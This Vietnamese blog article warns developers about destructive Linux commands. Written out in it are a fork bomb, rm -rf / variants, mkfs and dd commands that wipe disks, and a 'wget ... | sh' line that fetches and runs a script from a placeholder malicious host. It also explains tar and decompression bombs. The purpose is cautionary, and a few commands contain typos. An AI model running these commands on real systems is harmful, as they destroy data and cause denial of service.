9 command và mã Linux cực kì nguy hiểm mà các Dev phải cẩn thẩn

1677

Các lệnh của Linux shell/terminal có khả năng ảnh hưởng cực kì  mạnh mẽ và dù chỉ là một lệnh đơn giản cũng có thể dẫn đến việc xóa cả một tập tin hoặc thư mục gốc, vv

Trong một số trường hợp, Linux thậm chí sẽ không yêu cầu xác nhận lại vì nó sẽ thực hiện lệnh ngay lập tức khiến bạn mất dữ liệu và thông tin có giá trị được lưu trữ trong các tệp và thư mục này.

Chúng tôi đã tập hợp một số lệnh Linux có hại cho hệ thống để giúp bạn tránh được chúng. Hãy ghi nhớ rằng chúng thực sự nguy hiểm và thậm chí có thể bị thay đổi theo nhiều cách khác nhau để tạo ra các lệnh mới gây tổn thất lớn hơn nữa.

Một điều quan trọng cần lưu ý là những lệnh này chỉ nguy hiểm nếu chúng được bắt đầu bằng sudo trên Ubuntu. Trong khi trên các phiên bản phân phối Linux khác, hầu hết các lệnh được cung cấp này sẽ nguy hiểm để thực thi dưới dạng root.

1. Lệnh Linux Fork Bomb

:(){ :|: & };: hay còn biết đến với cái tên Fork Bomb là một cách tấn công thuộc dạng denial-of-service nhắm vào hệ thống Linux. :(){ :|: & };: bản chất là một bash function. Một khi được execute, nó sẽ tự lặp lại nhiều lần cho đến khi nào hệ thống bị quá tải và freeze.

Bạn sẽ chỉ có thể loại bỏ được nó bằng cách restart lại hệ thống của mình. Vì thế hãy cẩn thận khi execute lệnh này trong Linux shell.

2. Lệnh mv folder/dev/null

mv folder/dev/null là một lệnh nguy hiểm khác. Dev/null hay null device là một device file với khả năng bỏ đi mọi data đã viết lên nó nhưng lại thông báo rằng quá trình viết lại được execute thành công. Nó còn được biết dưới cái tên khác là bit bucked hoặc black hole.

3. Lệnh rm -rf

rm -rf là một trong những cách nhanh nhất để xóa một thư mục và nội dung trong đó trên hệ điều hành Linux. Nhưng nếu bạn không biết dùng đúng cách thì nó sẽ trở nên rất nguy hiểm với hệ thống. Một số cách kết hợp và sử dụng lệnh rm-rf thường thấy bao gồm:

  • rm lệnh từng được dùng để xóa file trong hệ thống Linux.
  • rm -f lệnh dùng để remove các read-only file trong thư mục mà không đưa ra lời nhắc trước khi thực hiện.
  • rm -r lệnh để xóa nội dung của một thư mục đệ quy
  • rm -d lệnh được sử dụng để xóa một thư mục trống nhưng nó sẽ từ chối xóa thư mục nếu nó không rỗng.
  • rm -rf/ lệnh được sử dụng để xóa bắt buộc (nó sẽ xóa thư mục ngay cả khi đã được bảo vệ) của tất cả nội dung trong thư mục gốc và thư mục con.
  • rm -rf* lệnh được sử dụng để xóa tất cả nội dung trong thư mục hiện tại (thư mục bạn hiện đang làm việc) và thư mục phụ.
  • rm -rf. lệnh được sử dụng để xóa tất cả nội dung trong thư mục hiện tại và thư mục phụ. Lệnh rm -r. [^.] * Cũng có thể được sử dụng với hiệu quả tương tự.
  • rm -i lệnh được sử dụng để xóa tệp và thư mục nhưng lời nhắc sẽ xuất hiện trước khi xóa.

4. Lệnh mkfs

mkfs có thể sẽ trở thành một lệnh nguy hiểm với các hệ thống chạy bằng Linux nếu bạn không biết chức năng của nó là gì. Mọi thứ được viết sau mkfs sẽ được format và thay thế bởi một Linux file system trống.

Tất cả các lệnh được đề cập dưới đây sẽ định dạng lại hard drive do đó nó sẽ yêu cầu quyền administrator:

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat

Lệnh mkfs.cramfs cũng sẽ làm điều tương tự nhưng nó lại còn không cần tới quyền administrator để execute.

5. Tar Bomb

Lệnh tar  được dùng để kết hợp nhiều files lại thành một file duy nhất (archived file) trong định dạng .tar. Một Tape Archive (Tar) bomb có thể được tạo ra bởi lệnh này.

Nó là một archive file với nguy cơ “nổ” thành hàng ngàn hoặc triệu file với tên tương tự những file đã có sẵn trong directory hiện tại thay vì trong một directory mới khi được untar.

Bạn có thể tránh trở thành nạn nhân của tar bomb bằng cách thường xuyên tạo directory được bảo vệ mới bất cứ khi nào bạn nhận được tệp tar và sau đó di chuyển tar file đó vào trong directory này trước khi untar nó.

Nếu tar file đó đúng là một tar bomb thì bạn chỉ cần đơn giản loại bỏ nó bằng cách xóa cả directory mới tạo. Một cách phòng ngừa khác là dựa vào -t để liệt kê ra mọi nội dung chứa trong một tar file để bạn có thể đoán được bản chất của nó.

6. Lệnh dd

Lệnh dd được dùng để copy & convert phân vùng đĩa cứng. Tuy nhiên, nó có thể trở nên đáng sợ nếu bạn nhẫm lẫn vị trí nơi đến.

Lệnh này có thể được biết tới như dưới đây:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda

Lệnh sau sẽ làm toàn bộ ổ cứng chính trở thành con số không: dd if=/dev/zero of=/dev/had

7. Shell Script Code

Một số người sẽ hãm hại bạn bằng cách cho một link vào shell script và khuyến khích bạn tải về và execute nó. Tuy vậy, script này có thể chứa code độc hại nguy hiểm bên trong. Định dạng của lệnh này có thể trông như sau: wget http://some_malicious_source -O- | sh. Trong đó, wget sẽ tải script về trong khi sh thì tải script execution.

8. Mã nguồn độc hại

Một số người sẽ đưa mã nguồn cho bạn và kêu hãy compile nó. Hãy cẩn thận vì những mã này tuy trông có vẻ bình thường nhưng lại là độc hại tới hệ thống của bạn. Để tránh trở thành nạn nhân, hãy chỉ chọn mã từ nguồn đáng tin cậy.

9. Decompression Bomb

Bạn nhận được một file nén rất nhẹ chỉ vài KB và được yêu cầu extract nó. Nhưng thật chất, những file nén này lại chứa lượng data rất lớn. Khi được giải nén thì sẽ có tới hàng trăm GB data ngay lập tức tràn ngập ổ cứng của bạn. Để tránh tình huống này, In fact, hãy chỉ chấp nhận data từ nguồn đáng tin cậy

Techtalk via hongkiat

CHIA SẺ